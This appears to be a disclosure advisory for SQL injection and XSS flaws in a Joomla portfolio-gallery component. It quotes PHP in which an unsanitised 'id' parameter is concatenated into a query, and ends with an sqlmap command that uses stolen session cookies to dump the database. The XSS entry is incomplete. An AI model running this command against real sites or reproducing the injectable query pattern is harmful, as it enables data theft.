Title:Huge-IT Portfolio Gallery manager v1.1.0 SQL Injection and XSSThe attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability: XSS line 156 in : ./administrator/components/com_portfoliogallery/views/video/tmpl/default.php 155 In file administrator/components/com_portfoliogallery/models/portfoliogallery.php: variable id is passed without any sanitization to the SQL query being built starting at line 53: 50 public function getPropertie() { 51 $db = JFactory::getDBO(); 52 $id_cat = JRequest::getVar('id'); 53 $query = $db->getQuery(true); 54 $query->select('#__huge_itportfolio_images.name as name,' 55 . '#__huge_itportfolio_images.id ,' 56 . '#__huge_itportfolio_portfolios.name as portName,' 57 . 'portfolio_id,#__huge_itportfolio_images.category as categ ory, #__huge_itportfolio_images.description as description,image_url,sl_url, sl_type,link_target,#__huge_itportfolio_images.ordering,#__huge_itportfolio_ images.published,published_in_sl_width'); 58 $query->from(array('#__huge_itportfolio_portfolios' => '#__huge_itpo rtfolio_portfolios', '#__huge_itportfolio_images' => '#__huge_itportfolio_im ages')); 59 $query->where('#__huge_itportfolio_portfolios.id = portfolio_id')->w here('portfolio_id=' . $id_cat); 60 $query->order('ordering asc'); 61 $db->setQuery($query); 62 $results = $db->loadObjectList(); 63 return $results; sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_portfoliogallery&view=portfoliogallery&id=*" --dbms mysql --dump